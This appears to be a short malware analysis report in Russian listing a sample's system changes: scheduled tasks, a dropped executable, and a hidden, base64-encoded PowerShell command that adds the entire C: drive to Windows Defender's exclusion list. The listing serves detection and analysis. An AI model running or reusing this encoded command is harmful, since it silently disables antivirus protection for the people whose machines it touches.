Техническая информация
- <SYSTEM32>\tasks\fiorj
- <SYSTEM32>\tasks\lsstdd
- %LOCALAPPDATA%\xhcufjy\fiorj.exe
- <SYSTEM32>\tasks\lsstdd
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==' (со скрытым окном)
- '<SYSTEM32>\taskeng.exe' {1D054F97-4F18-4607-ABCB-DF266726543A} S-1-5-21-1960123792-2022915161-3775307078-1001:cecbzfqhv\user:S4U
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==